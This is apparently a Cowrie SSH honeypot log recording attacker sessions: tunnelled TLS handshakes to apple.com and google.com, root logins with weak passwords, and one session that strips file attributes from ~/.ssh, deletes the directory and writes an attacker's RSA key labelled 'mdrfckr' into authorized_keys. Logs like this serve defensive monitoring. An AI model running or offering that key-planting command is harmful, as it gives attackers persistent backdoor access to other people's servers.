{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.76.24.222","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1b\\x85\\xa4^zvi\\xc6\\xd04\\xd8\\xaa\\x85\\xef\\xc0\\xfb\\xe0\\xf9\\x9dv\\xf4\\xb3X\\x87D\\xca,\\xc9\\x1f\\x02\\xb2w k*\\tOi\\xd1P\\xa0\\xe3\\xb6}\\\\\\x8a*\\xd4\\xdeO\\x9e\\xf6\\xa0\\xe3ix\\xe5}N\\xa0>\\x04\\xa6\\xa2=\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe6\\x00\\x0c\\x9ee\\xb8\\xc3\\x00\\xce\\xfa\\xc0\\xcbW\\xad\\xca<\\xd4\\x1e\\x8e\\xc7/= \\x03\\xe7\\xb3\\xb2\\t\\x9f}\\x91-\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 104.76.24.222:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1b\\x85\\xa4^zvi\\xc6\\xd04\\xd8\\xaa\\x85\\xef\\xc0\\xfb\\xe0\\xf9\\x9dv\\xf4\\xb3X\\x87D\\xca,\\xc9\\x1f\\x02\\xb2w k*\\tOi\\xd1P\\xa0\\xe3\\xb6}\\\\\\x8a*\\xd4\\xdeO\\x9e\\xf6\\xa0\\xe3ix\\xe5}N\\xa0>\\x04\\xa6\\xa2=\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe6\\x00\\x0c\\x9ee\\xb8\\xc3\\x00\\xce\\xfa\\xc0\\xcbW\\xad\\xca<\\xd4\\x1e\\x8e\\xc7/= \\x03\\xe7\\xb3\\xb2\\t\\x9f}\\x91-\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T00:23:23.173835Z","src_ip":"212.227.235.229","session":"45a9cf68e915"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"212.227.235.229","src_port":53772,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:53772","sensor":"my-vps","timestamp":"2025-08-26T00:23:23.950731Z","session":"45a9cf68e915"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03x\\xc9C\\x94o\\xee\\xbb\\x85\\x11\\xabm\\xe5W\\xf4\\x12\\x88\\xe8\\x10\\xab\\xac\\xbe\\xc5\\xcf\\x95\\xee.\\xa8\\x07^\\xc1\\x7fi \\xe6[<E\\xeb\\xe7rO\\x00j\\xe4\\x97m.\\xecNK\\x02%+\\xbb1X\\xb4\\x06\\xa6\\x0f\\xd8\\x08B\\xad\\xab\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x8f\\x07HWy\\x81\\x1a\\xa2#\\x87w\\xa1b\\xd9b!\\xe5Z\\x9e6\\xdc]\\xc4\\x95q\\xdd\\xd9\\xa1\\xd7\\xb9L\\x04\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03x\\xc9C\\x94o\\xee\\xbb\\x85\\x11\\xabm\\xe5W\\xf4\\x12\\x88\\xe8\\x10\\xab\\xac\\xbe\\xc5\\xcf\\x95\\xee.\\xa8\\x07^\\xc1\\x7fi \\xe6[<E\\xeb\\xe7rO\\x00j\\xe4\\x97m.\\xecNK\\x02%+\\xbb1X\\xb4\\x06\\xa6\\x0f\\xd8\\x08B\\xad\\xab\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x8f\\x07HWy\\x81\\x1a\\xa2#\\x87w\\xa1b\\xd9b!\\xe5Z\\x9e6\\xdc]\\xc4\\x95q\\xdd\\xd9\\xa1\\xd7\\xb9L\\x04\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T00:23:25.334347Z","src_ip":"212.227.235.229","session":"45a9cf68e915"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:25.512362Z","src_ip":"212.227.235.229","session":"45a9cf68e915"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":45318,"dst_ip":"1.2.3.4","dst_port":22,"session":"980dd02c0537","protocol":"ssh","message":"New connection: 194.0.234.21:45318 (1.2.3.4:22) [session: 980dd02c0537]","sensor":"my-vps","timestamp":"2025-08-26T00:23:36.889680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T00:23:36.890549Z","src_ip":"194.0.234.21","session":"980dd02c0537"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T00:23:36.908759Z","src_ip":"194.0.234.21","session":"980dd02c0537"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:23:37.000950Z","src_ip":"194.0.234.21","session":"980dd02c0537"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:50.146284Z","src_ip":"194.0.234.21","session":"980dd02c0537"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37352,"dst_ip":"1.2.3.4","dst_port":22,"session":"b853a7f4fea1","protocol":"ssh","message":"New connection: 45.159.112.103:37352 (1.2.3.4:22) [session: b853a7f4fea1]","sensor":"my-vps","timestamp":"2025-08-26T00:23:55.645829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:23:55.646719Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:23:55.755060Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc123@#","message":"login attempt [root/Abc123@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:23:56.231088Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:23:56.466628Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:23:56.467452Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:23:56.468581Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:56.578151Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:23:56.891476Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:23:56.892274Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:23:57.003393Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:57.004601Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37368,"dst_ip":"1.2.3.4","dst_port":22,"session":"abe7914b9fda","protocol":"ssh","message":"New connection: 45.159.112.103:37368 (1.2.3.4:22) [session: abe7914b9fda]","sensor":"my-vps","timestamp":"2025-08-26T00:23:57.100245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:23:57.101037Z","src_ip":"45.159.112.103","session":"abe7914b9fda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:23:57.203489Z","src_ip":"45.159.112.103","session":"abe7914b9fda"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:23:57.655313Z","src_ip":"45.159.112.103","session":"abe7914b9fda"}
